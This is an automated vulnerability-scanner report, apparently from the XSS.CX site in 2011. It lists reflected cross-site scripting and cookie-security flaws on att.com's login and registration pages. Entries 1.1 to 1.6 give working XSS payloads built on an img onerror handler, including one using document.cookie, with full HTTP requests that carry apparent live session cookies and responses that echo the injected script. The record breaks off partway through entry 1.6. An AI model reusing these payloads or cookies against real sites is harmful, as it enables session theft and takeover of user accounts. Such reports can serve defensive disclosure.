XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, att.com, Login Form

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Apr 28 10:55:28 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading

1. Cross-site scripting (reflected)

1.1. https://www.att.com/olam/a [REST URL parameter 2]

1.2. https://www.att.com/olam/js/cookie.js [REST URL parameter 2]

1.3. https://www.att.com/olam/js/cookie.js [REST URL parameter 3]

1.4. https://www.att.com/olam/js/flash.js [REST URL parameter 2]

1.5. https://www.att.com/olam/js/flash.js [REST URL parameter 3]

1.6. https://www.att.com/olam/js/posUtil.js [REST URL parameter 2]

1.7. https://www.att.com/olam/js/posUtil.js [REST URL parameter 3]

1.8. https://www.att.com/olam/js/registration.js [REST URL parameter 2]

1.9. https://www.att.com/olam/js/registration.js [REST URL parameter 3]

1.10. https://www.att.com/olam/js/sniffer.js [REST URL parameter 2]

1.11. https://www.att.com/olam/js/sniffer.js [REST URL parameter 3]

1.12. https://www.att.com/olam/js/tool-tips.js [REST URL parameter 2]

1.13. https://www.att.com/olam/js/tool-tips.js [REST URL parameter 3]

1.14. https://www.att.com/olam/js/validate.js [REST URL parameter 2]

1.15. https://www.att.com/olam/js/validate.js [REST URL parameter 3]

1.16. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 2]

1.17. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 3]

1.18. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 4]

1.19. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp [REST URL parameter 5]

1.20. https://www.att.com/olam/loginAction.olamexecute [REST URL parameter 2]

1.21. https://www.att.com/olam/registrationAction.olamexecute [REST URL parameter 2]

2. SSL cookie without secure flag set

2.1. https://www.att.com/olam/a

2.2. https://www.att.com/olam/loginAction.olamexecute

2.3. https://www.att.com/olam/logout.olamexecute

2.4. https://www.att.com/olam/registrationAction.olamexecute

2.5. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp

3. Cookie without HttpOnly flag set

3.1. https://www.att.com/olam/a

3.2. https://www.att.com/olam/loginAction.olamexecute

3.3. https://www.att.com/olam/logout.olamexecute

3.4. https://www.att.com/olam/registrationAction.olamexecute

3.5. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp

4. Password field with autocomplete enabled

4.1. https://www.att.com/olam/loginAction.olamexecute

4.2. https://www.att.com/olam/logout.olamexecute

5. Cookie scoped to parent domain

5.1. https://www.att.com/olam/a

5.2. https://www.att.com/olam/jsp/tiles/common_includes/cGateCookie.jsp

5.3. https://www.att.com/olam/loginAction.olamexecute

5.4. https://www.att.com/olam/logout.olamexecute

5.5. https://www.att.com/olam/registrationAction.olamexecute

6. Cross-domain Referer leakage

7. Email addresses disclosed

7.1. https://www.att.com/olam/loginAction.olamexecute

7.2. https://www.att.com/olam/logout.olamexecute

7.3. https://www.att.com/olam/registrationAction.olamexecute

8. Cacheable HTTPS response

9. Content type incorrectly stated

10. Content type is not specified

10.1. https://www.att.com/olam/js/AC_RunActiveContent.js

10.2. https://www.att.com/olam/js/ATT-Olam-english-mtagconfig.js

10.3. https://www.att.com/olam/js/Ajax.js

10.4. https://www.att.com/olam/js/UserMessaging.js

10.5. https://www.att.com/olam/js/cookie.js

10.6. https://www.att.com/olam/js/cssBrowserSelector.js

10.7. https://www.att.com/olam/js/flash.js

10.8. https://www.att.com/olam/js/gvpUtils.js

10.9. https://www.att.com/olam/js/hideSelect.js

10.10. https://www.att.com/olam/js/posUtil.js

10.11. https://www.att.com/olam/js/prototype.js

10.12. https://www.att.com/olam/js/registration.js

10.13. https://www.att.com/olam/js/sessionTimeout.js

10.14. https://www.att.com/olam/js/sniffer.js

10.15. https://www.att.com/olam/js/tool-tips.js

10.16. https://www.att.com/olam/js/validate.js

10.17. https://www.att.com/olam/js/vidSwitcher.js

10.18. https://www.att.com/olam/jsp/profile/imageupload/BrowserDetect.js



1. Cross-site scripting (reflected)  next
There are 21 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.att.com/olam/a [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fed8"><img%20src%3da%20onerror%3dalert(1)>eec0d5667c6 was submitted in the REST URL parameter 2. This input was echoed as 4fed8"><img src=a onerror=alert(1)>eec0d5667c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/a4fed8"><img%20src%3da%20onerror%3dalert(1)>eec0d5667c6 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecuted4776%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E308930536fd?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-account-mgmt%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22N%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22https%3A%2F%2Fwww.att.com%2Folam%2FregistrationAction.olamexecute%22%2C%22pv%22%3A4%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d2%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%2C%22d5%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A5%2C%22sd%22%3A5%7D; TLTHID=5893ADCE7126107198F1EED8C4C046B3; EDOCSSESSIONID=2FJ8N4nZNcBJz7zWkb4nGfTymqd6f1GdMLvSJZDxbFZfFfGDYwgC!725500378

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Content-Length: 9076
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:35:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=0FABE03071271071BAF29E552188C3F4; path=/; domain=.att.com
Set-Cookie: EDOCSSESSIONID=NpT7N4yMShNHyYhgQQQC2QBfgGLhjP7kgC8GSWyvpPW3fX2KkLv6!-744530585; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/a4fed8"><img src=a onerror=alert(1)>eec0d5667c6">
...[SNIP]...

1.2. https://www.att.com/olam/js/cookie.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/cookie.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57233"><img%20src%3da%20onerror%3dalert(1)>f6eb79beca9 was submitted in the REST URL parameter 2. This input was echoed as 57233"><img src=a onerror=alert(1)>f6eb79beca9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js57233"><img%20src%3da%20onerror%3dalert(1)>f6eb79beca9/cookie.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9087
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js57233"><img src=a onerror=alert(1)>f6eb79beca9/cookie.js">
...[SNIP]...

1.3. https://www.att.com/olam/js/cookie.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/cookie.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02ed"><img%20src%3da%20onerror%3dalert(1)>ee81a26d9d4 was submitted in the REST URL parameter 3. This input was echoed as f02ed"><img src=a onerror=alert(1)>ee81a26d9d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/cookie.jsf02ed"><img%20src%3da%20onerror%3dalert(1)>ee81a26d9d4 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9087
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:41 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA8770F87125107197929E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/cookie.jsf02ed"><img src=a onerror=alert(1)>ee81a26d9d4">
...[SNIP]...

1.4. https://www.att.com/olam/js/flash.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/flash.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548c4"><img%20src%3da%20onerror%3dalert(1)>e6d09755fe5 was submitted in the REST URL parameter 2. This input was echoed as 548c4"><img src=a onerror=alert(1)>e6d09755fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js548c4"><img%20src%3da%20onerror%3dalert(1)>e6d09755fe5/flash.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9086
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:35 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js548c4"><img src=a onerror=alert(1)>e6d09755fe5/flash.js">
...[SNIP]...

1.5. https://www.att.com/olam/js/flash.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/flash.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad5b"><img%20src%3da%20onerror%3dalert(1)>aaa1390615f was submitted in the REST URL parameter 3. This input was echoed as aad5b"><img src=a onerror=alert(1)>aaa1390615f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/js/flash.jsaad5b"><img%20src%3da%20onerror%3dalert(1)>aaa1390615f HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9086
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:25:40 GMT
Connection: keep-alive
Set-Cookie: TLTHID=AA6B03647125107197909E552188C3F4; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
   <title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/js/flash.jsaad5b"><img src=a onerror=alert(1)>aaa1390615f">
...[SNIP]...

1.6. https://www.att.com/olam/js/posUtil.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/posUtil.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4874"><img%20src%3da%20onerror%3dalert(1)>d5d0d3e26ba was submitted in the REST URL parameter 2. This input was echoed as c4874"><img src=a onerror=alert(1)>d5d0d3e26ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/jsc4874"><img%20src%3da%20onerror%3dalert(1)>d5d0d3e26ba/posUtil.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
